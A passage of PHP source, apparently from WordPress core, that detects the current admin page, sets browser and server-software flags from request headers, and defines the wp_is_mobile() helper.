		$pagenow = strtolower( $self_matches[1] );
		if ( '.php' !== substr( $pagenow, -4, 4 ) ) {
			$pagenow .= '.php'; // For `Options +Multiviews`: /wp-admin/themes/index.php (themes.php is queried).
		}
	}
} else {
	if ( preg_match( '#([^/]+\.php)([?/].*?)?$#i', $_SERVER['PHP_SELF'], $self_matches ) ) {
		$pagenow = strtolower( $self_matches[1] );
	} else {
		$pagenow = 'index.php';
	}
}
unset( $self_matches );

// Simple browser detection.
$is_lynx   = false;
$is_gecko  = false;
$is_winIE  = false;
$is_macIE  = false;
$is_opera  = false;
$is_NS4    = false;
$is_safari = false;
$is_chrome = false;
$is_iphone = false;
$is_edge   = false;

if ( isset( $_SERVER['HTTP_USER_AGENT'] ) ) {
	if ( strpos( $_SERVER['HTTP_USER_AGENT'], 'Lynx' ) !== false ) {
		$is_lynx = true;
	} elseif ( strpos( $_SERVER['HTTP_USER_AGENT'], 'Edge' ) !== false ) {
		$is_edge = true;
	} elseif ( stripos( $_SERVER['HTTP_USER_AGENT'], 'chrome' ) !== false ) {
		if ( stripos( $_SERVER['HTTP_USER_AGENT'], 'chromeframe' ) !== false ) {
			$is_admin = is_admin();
			/**
			 * Filters whether Google Chrome Frame should be used, if available.
			 *
			 * @since 3.2.0
			 *
			 * @param bool $is_admin Whether to use the Google Chrome Frame. Default is the value of is_admin().
			 */
			$is_chrome = apply_filters( 'use_google_chrome_frame', $is_admin );
			if ( $is_chrome ) {
				header( 'X-UA-Compatible: chrome=1' );
			}
			$is_winIE = ! $is_chrome;
		} else {
			$is_chrome = true;
		}
	} elseif ( stripos( $_SERVER['HTTP_USER_AGENT'], 'safari' ) !== false ) {
		$is_safari = true;
	} elseif ( ( strpos( $_SERVER['HTTP_USER_AGENT'], 'MSIE' ) !== false || strpos( $_SERVER['HTTP_USER_AGENT'], 'Trident' ) !== false ) && strpos( $_SERVER['HTTP_USER_AGENT'], 'Win' ) !== false ) {
		$is_winIE = true;
	} elseif ( strpos( $_SERVER['HTTP_USER_AGENT'], 'MSIE' ) !== false && strpos( $_SERVER['HTTP_USER_AGENT'], 'Mac' ) !== false ) {
		$is_macIE = true;
	} elseif ( strpos( $_SERVER['HTTP_USER_AGENT'], 'Gecko' ) !== false ) {
		$is_gecko = true;
	} elseif ( strpos( $_SERVER['HTTP_USER_AGENT'], 'Opera' ) !== false ) {
		$is_opera = true;
	} elseif ( strpos( $_SERVER['HTTP_USER_AGENT'], 'Nav' ) !== false && strpos( $_SERVER['HTTP_USER_AGENT'], 'Mozilla/4.' ) !== false ) {
		$is_NS4 = true;
	}
}

if ( $is_safari && stripos( $_SERVER['HTTP_USER_AGENT'], 'mobile' ) !== false ) {
	$is_iphone = true;
}

$is_IE = ( $is_macIE || $is_winIE );

// Server detection.

/**
 * Whether the server software is Apache or something else
 *
 * @global bool $is_apache
 */
$is_apache = ( strpos( $_SERVER['SERVER_SOFTWARE'], 'Apache' ) !== false || strpos( $_SERVER['SERVER_SOFTWARE'], 'LiteSpeed' ) !== false );

/**
 * Whether the server software is Nginx or something else
 *
 * @global bool $is_nginx
 */
$is_nginx = ( strpos( $_SERVER['SERVER_SOFTWARE'], 'nginx' ) !== false );

/**
 * Whether the server software is IIS or something else
 *
 * @global bool $is_IIS
 */
$is_IIS = ! $is_apache && ( strpos( $_SERVER['SERVER_SOFTWARE'], 'Microsoft-IIS' ) !== false || strpos( $_SERVER['SERVER_SOFTWARE'], 'ExpressionDevServer' ) !== false );

/**
 * Whether the server software is IIS 7.X or greater
 *
 * @global bool $is_iis7
 */
$is_iis7 = $is_IIS && (int) substr( $_SERVER['SERVER_SOFTWARE'], strpos( $_SERVER['SERVER_SOFTWARE'], 'Microsoft-IIS/' ) + 14 ) >= 7;

/**
 * Test if the current browser runs on a mobile device (smart phone, tablet, etc.)
 *
 * @since 3.4.0
 *
 * @return bool
 */
function wp_is_mobile() {
	if ( empty( $_SERVER['HTTP_USER_AGENT'] ) ) {
		$is_mobile = false;
	} elseif ( strpos( $_SERVER['HTTP_USER_AGENT'], 'Mobile' ) !== false // Many mobile devices (all iPhone, iPad, etc.)
		|| strpos( $_SERVER['HTTP_USER_AGENT'], 'Android' ) !== false
		|| strpos( $_SERVER['HTTP_USER_AGENT'], 'Silk/' ) !== false
		|| strpos( $_SERVER['HTTP_USER_AGENT'], 'Kindle' ) !== false
		|| strpos( $_SERVER['HTTP_USER_AGENT'], 'BlackBerry' ) !== false
		|| strpos( $_SERVER['HTTP_USER_AGENT'], 'Opera Mini' ) !== false
		|| strpos( $_SERVER['HTTP_USER_AGENT'], 'Opera Mobi' ) !== false ) {
			$is_mobile = true;
	} else {
		$is_mobile = false;
	}

	/**
	 * Filters whether the request should be treated as coming from a mobile device or not.
	 *
	 * @since 4.9.0
	 *
	 * @param bool $is_mobile Whether the request is from a mobile device or not.
	 */
	return apply_filters( 'wp_is_mobile', $is_mobile );
}
